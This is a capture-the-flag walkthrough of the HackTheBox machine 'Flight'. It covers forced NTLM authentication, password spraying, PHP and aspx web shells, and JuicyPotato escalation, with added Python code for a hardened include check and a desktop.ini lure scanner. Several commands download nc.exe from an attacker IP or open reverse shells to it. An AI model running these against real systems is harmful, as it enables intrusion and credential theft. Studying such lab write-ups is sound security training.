Flight from HackTheBox involved forced NTLM authentication to get svc_apache's hash. Password spraying that password over the enumerated usernames leads us to S.moon, who had write access to the Shared share, allowing us to upload a desktop.ini and again perform forced authentication to get c.bum's hash. That user had access to the web directory through SMB, allowing us to upload a PHP file and get command execution as svc_apache. On enumerating local ports, port 8000 was running and hosting the directory C:\inetpub\development; on uploading an aspx file there, we got commands running in the context of the iis apppool service account, which had the SeImpersonate privilege enabled. That can be abused through JuicyPotato to get a system shell.
NMAP
Nmap scan report for 10.10.11.187
Host is up (0.28s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-17 00:13:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
PORT 139/445 (SMB)
Checking null authentication on SMB shows that we can't access any share anonymously.
PORT 80 (HTTP)
The site didn't have anything there, as it was just a page with no links, and gobuster didn't show anything interesting either. So we add flight.htb to the /etc/hosts file, as we can see the domain name at the bottom of the page.
Fuzzing for subdomains using wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb" --hh 7069
Adding this subdomain to the hosts file and accessing the site. Checking for Local File Inclusion, the application filters .. if it's in the URL but allows /.
Foothold (Svc_apache)
Running wfuzz again to fuzz for LFI payloads, we find that we can just specify a file name without using the .. sequence. Let's verify if we have remote file inclusion; if we do, we can just try accessing a fake share on our machine and use responder to capture the NTLMv2 hash.
We have a hit, so now we run responder and access a fake share with //IP/share
responder -I tun0
http://school.flight.htb/index.php?view=//10.10.14.28/uwu
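The weak filter described above (only the literal .. is refused, so both a UNC reference and an absolute file name are accepted by the include) modelled in Python beside an allowlist version. This is an added example, not the site's code; the web root and page names are assumptions.

```python
import posixpath as pp
import re

# Assumed layout for the model; the real site's web root and page names are
# not on the page. A UNC reference is \\host\share or //host/share.
WEB_ROOT = "/var/www/school"
ALLOWED_PAGES = {"home.html", "about.html", "blog.html"}
UNC_RE = re.compile(r"^[\\/]{2}[^\\/]+[\\/]")
DRIVE_RE = re.compile(r"^[A-Za-z]:")


def is_absolute(view):
    """True for UNC, drive-letter and root-anchored references."""
    return bool(UNC_RE.match(view) or DRIVE_RE.match(view)
                or view.startswith(("/", "\\")))


def vulnerable_resolve(view):
    """Model of the weak check: only a literal '..' is refused.

    Everything else reaches the include unchanged, so a UNC reference sends the
    PHP worker to authenticate to whatever host the request names, and an
    absolute path discloses local files without any traversal at all."""
    if ".." in view:
        return None
    return view if is_absolute(view) else pp.join(WEB_ROOT, view)


def hardened_resolve(view):
    """Allowlist the page name, then confine the result to the web root."""
    if is_absolute(view) or any(c in view for c in "/\\:"):
        return None
    if view not in ALLOWED_PAGES:
        return None
    target = pp.normpath(pp.join(WEB_ROOT, view))
    # Belt and braces: even an allowlisted name must stay under WEB_ROOT.
    if pp.commonpath([WEB_ROOT, target]) != WEB_ROOT:
        return None
    return target
```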
Saving this hash in a file and cracking it with john
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
With the valid credentials we can start enumerating the shares and usernames through crackmapexec. Using enum4linux-ng to query usernames and filtering the output to a list of usernames so that we can password spray against them
enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt
S.moon
Using either cme or kerbrute to perform a password spray, we'll find that S.Moon has the same password
kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'
cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
Checking shares with s.moon, we see that we have write access on `shared`
C.bum
On uploading a .scf file to perform forced authentication, it didn't allow us to upload that extension, not sure why. But uploading a desktop.ini file worked:
[.ShellClassInfo]
IconResource=\\10.10.14.28\aa
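A defender-side check for the lure just shown, added here and not part of the original writeup: a Python scanner that walks a share (or a copy of it) and flags desktop.ini and .scf files whose icon entry points at a UNC path, which is what makes Explorer authenticate outward when the folder is browsed. The sample share it builds is constructed.

```python
import re
import tempfile
from pathlib import Path

# Keys Explorer resolves (and authenticates to) when rendering a folder, and a
# pattern for \\host\share or //host/share values. desktop.ini is often UTF-16.
LURE_KEYS = {"iconresource", "iconfile"}
UNC_RE = re.compile(r"^(\\\\|//)([^\\/]+)[\\/]")


def scan_ini_text(text):
    """Return (key, value, host) for each lure key whose value is a UNC path."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if "=" not in line or line.startswith((";", "[")):
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        match = UNC_RE.match(value)
        if key.lower() in LURE_KEYS and match:
            hits.append((key, value, match.group(2)))
    return hits


def scan_tree(root):
    """Walk a share (or a copy of it); report lures as (path, key, value, host)."""
    findings = []
    for path in Path(root).rglob("*"):
        low = path.name.lower()
        if not path.is_file() or (low != "desktop.ini" and not low.endswith(".scf")):
            continue
        data = path.read_bytes()
        enc = "utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8"
        for key, value, host in scan_ini_text(data.decode(enc, "replace")):
            findings.append((str(path), key, value, host))
    return findings


def demo():
    """Constructed share: the writeup's lure beside a benign desktop.ini."""
    root = Path(tempfile.mkdtemp())
    samples = {
        "Shared/desktop.ini": "[.ShellClassInfo]\nIconResource=\\\\10.10.14.28\\aa\n",
        "Shared/Docs/desktop.ini": "[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\shell32.dll,3\n",
    }
    for rel, text in samples.items():
        path = root.joinpath(*rel.split("/"))
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text, encoding="utf-8")
    return sorted((Path(p).relative_to(root).as_posix(), k, v, h) for p, k, v, h in scan_tree(root))
```

Only the share-level desktop.ini is reported; the local shell32.dll icon reference in the subfolder is left alone.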
Cracking this hash again with john
Foothold
This user has write access on the web share, which means that we can upload a PHP file which will be reflected on school.flight.htb
Uploading a PHP file calling phpinfo()
<?php phpinfo(); ?>
Having the ability to execute commands on the system, we can get a reverse shell by uploading nc.exe and executing it
http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe
http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe
Since we already have the credentials of c.bum, we can execute commands as that user using RunasCs.exe
.\RunasCs.exe c.bum Tikkycoll_431012284 whoami
Running netstat, we'll see that port 8000 is open locally
Port forwarding port 8000 using chisel
chisel server --reverse -p 8001
And running the client on the target machine
.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000
Accessing the port in our browser shows that access is denied, but the error reveals the path where the directory is hosted, C:\inetpub\Development. In this folder, there are a few html files.
Running icacls on the Development folder shows that c.bum has write access
Using RunasCs we can switch user to c.bum and transfer an aspx shell into that directory
.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'
Accessing the file through the browser. I tried executing nc.exe to get a reverse shell but it wasn't working for some reason, so instead I generated a msfvenom payload, transferred it and executed it.
On checking the privileges of iis apppool, SeImpersonate was enabled. To abuse this, we can use JuicyPotato-ng to get a system shell
.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"